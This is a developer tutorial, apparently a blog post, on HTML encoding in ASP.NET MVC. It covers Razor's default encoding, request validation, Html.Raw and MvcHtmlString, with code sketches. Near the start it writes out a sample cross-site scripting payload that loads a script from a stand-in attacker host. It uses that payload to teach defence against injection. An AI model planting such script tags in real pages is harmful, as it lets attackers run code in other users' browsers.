Understanding Text Encoding in ASP.NET MVC (ASP.NET MVC Foundations Series)

[The code for this post is available on GitHub]

This article covers the various ways you can handle text encoding in ASP.NET MVC. If you are writing a forum web app, for example, you should absolutely be paranoid about what your users type into your site, and very careful about how you redisplay their input. A friendly forum user might write something like:

Nice post, thanks for sharing!

On the other hand, they may write:

<script src="http://evilserver.com/xss.js"></script>
<script>xss.doBadDeeds();</script>

If you turn around and show this “post” to your other users, their browsers will run the attacker’s script and they may well get hacked. At a minimum, the evil-doers could be a nuisance to your real users.

On the other hand, if you’re building a CMS or a utility helper method, you do not want to filter out the HTML a user might type. They probably need to enter some HTML which you’ll want to show to all the other users. The same goes for HTML your own code generates.

There are at least three ways in which MVC manages and encodes (or does not encode) text data. Knowing which scenario you’re targeting allows you to choose the right option. We’ll look at four examples in this post:

  1. A forum app which can be hacked
  2. A forum app which is safe from XSS injection
  3. A CMS app with rich text editing
  4. Generating HTML in code for use in MVC Razor views

Protecting Against Unwanted HTML Inputs

First, the good news. MVC protects you in several ways against HTML / JS injection. When you write a string into a view with Razor’s @ syntax, for example @commentText, MVC HTML-encodes it by default.
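A minimal sketch of such a view, assuming a hypothetical local variable named commentText that stands in for untrusted user input (in a real app it would come from the model):

```cshtml
@{
    // Hypothetical value standing in for untrusted user input.
    var commentText = "<script src='evil.js'></script>";
}

<p>Comment text:</p>

@* Written with @, so Razor HTML-encodes the string before output. *@
<p>@commentText</p>
```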

If we assume commentText = "<script src='evil.js'></script>", then the output would simply be:

Comment text:
<script src='evil.js'></script>

That is &lt;script src=&#39;evil.js&#39;&gt;&lt;/script&gt; in view source, which is perfectly safe: the browser displays the markup as text instead of running it.

Next, it is unlikely that this input ever makes it into your app. By default, if an action method receives input like this, ASP.NET request validation rejects the request with the following message:

Error on submit:
A potentially dangerous Request.Form value was detected from the client…

Of course, we could disable this by putting a [ValidateInput(false)] attribute on the action method.
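A minimal sketch of an action with validation turned off. The controller name, action name, and redirect target are hypothetical; only the ValidateInput attribute itself comes from the post:

```csharp
using System.Web.Mvc;

// Hypothetical controller, for illustration only.
public class ForumController : Controller
{
    // ValidateInput(false) switches off request validation for this action,
    // so raw markup in commentText reaches the method unmodified.
    [HttpPost]
    [ValidateInput(false)]
    public ActionResult AddComment(string commentText)
    {
        // Hypothetical: save commentText somewhere, then redirect.
        // The value is untrusted and must be encoded whenever it is displayed.
        return RedirectToAction("Index");
    }
}
```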

In this case, you must be VERY careful when you write out the commentText values later.

So far we have seen that by default Razor outputs text in a safe way when you use @value. Also, POST requests with dangerous content are blocked unless you explicitly let them in.

In order to demonstrate these concepts, I created a working sample app here:

http://text-encoding-aspnet-mvc-by-example.azurewebsites.net/

View the safe forum and unsafe forum sections to see what happens. You can download the code from the sample as well.

Allowing Direct HTML Inputs

But what if you trust the input and need MVC out of the way so you can write true HTML content to the browser? One such example might be a CMS you’re writing. There are two cases you would treat differently here. Is your HTML coming from data given to your view or from code called by your view?

Let’s assume it’s handed to you as a string in a variable called cmsSectionData (i.e. it is data). Then we can use the Html.Raw helper method:

   @Html.Raw(cmsSectionData)

rather than @cmsSectionData. This will make the contents of cmsSectionData part of your HTML in the view. You will also need to disable validation on any edit pages using [ValidateInput(false)] as shown above.
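To make the difference concrete, here is a small sketch that writes the same string both ways. The sample content is made up, and in a real CMS the string would come from your data store rather than a local variable:

```cshtml
@{
    // Hypothetical trusted content, e.g. loaded from the CMS database.
    var cmsSectionData = "<h2>Welcome</h2><p>Edited by an <em>admin</em>.</p>";
}

@* Encoded: the browser shows the tags as literal text. *@
<div>@cmsSectionData</div>

@* Raw: the browser renders a heading and a paragraph. *@
<div>@Html.Raw(cmsSectionData)</div>
```

Only use the second form for content you trust, since nothing in it is encoded.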

Check out the CMS section of the demo to see it in action.

Finally, if you are writing little helper methods to make your views cleaner (a good idea!), you’ll do something totally different. For example, suppose we frequently need to wrap images in links in our views. We could write out the HTML each time, or we could write a method called LinkWithImage on a class of our own called OurHtmlHelper. Here is an example implementation:
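A minimal sketch of what such a helper might look like. The original listing is not available, so the static class and the two string parameters (linkUrl and imageUrl) are assumptions:

```csharp
// Assumed shape of the helper; parameter names are hypothetical.
public static class OurHtmlHelper
{
    // Naive version: returns a plain string. Razor will HTML-encode
    // the result when it is written to a view with @.
    public static string LinkWithImage(string linkUrl, string imageUrl)
    {
        return "<a href=\"" + linkUrl + "\"><img src=\"" + imageUrl + "\" /></a>";
    }
}
```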

You might think we could write code like this:
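For instance, a call from a view might look like the sketch below. It assumes LinkWithImage returns a plain string, that OurHtmlHelper is in scope for the view, and that the two URLs are placeholders:

```cshtml
@* Hypothetical URLs. The helper returns a string, so @ HTML-encodes it. *@
@OurHtmlHelper.LinkWithImage("/products", "/images/products.png")
```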

But MVC’s encoding for @ would block it for sure: the returned markup would be encoded and shown as literal text instead of a clickable image. You could wrap the call in @Html.Raw(), but there is a better way.

Introducing the MvcHtmlString class

The purpose of this class is to inform MVC to get out of the way and NOT encode the contents. So simply changing the return type of LinkWithImage to MvcHtmlString fixes it.
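A sketch of the helper with the new return type, under the same assumptions as before (static class, hypothetical linkUrl and imageUrl parameters). Because Razor no longer encodes the result, this version encodes the attribute values itself, which is an addition of mine rather than something the post prescribes:

```csharp
using System.Web;
using System.Web.Mvc;

// Assumed shape of the helper; parameter names are hypothetical.
public static class OurHtmlHelper
{
    public static MvcHtmlString LinkWithImage(string linkUrl, string imageUrl)
    {
        // Encode the attribute values ourselves, since Razor will not
        // encode anything inside an MvcHtmlString.
        string html = string.Format(
            "<a href=\"{0}\"><img src=\"{1}\" /></a>",
            HttpUtility.HtmlAttributeEncode(linkUrl),
            HttpUtility.HtmlAttributeEncode(imageUrl));

        // MvcHtmlString marks the content as already-safe HTML.
        return MvcHtmlString.Create(html);
    }
}
```

With this version, a plain @OurHtmlHelper.LinkWithImage(...) call in a view emits the markup as-is, with no Html.Raw wrapper needed.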

Check out the Helpers section of the demo to see this in action.

There you have it. Three ways to encode or avoid encoding HTML data in ASP.NET MVC applications.

Cheers,
@mkennedy
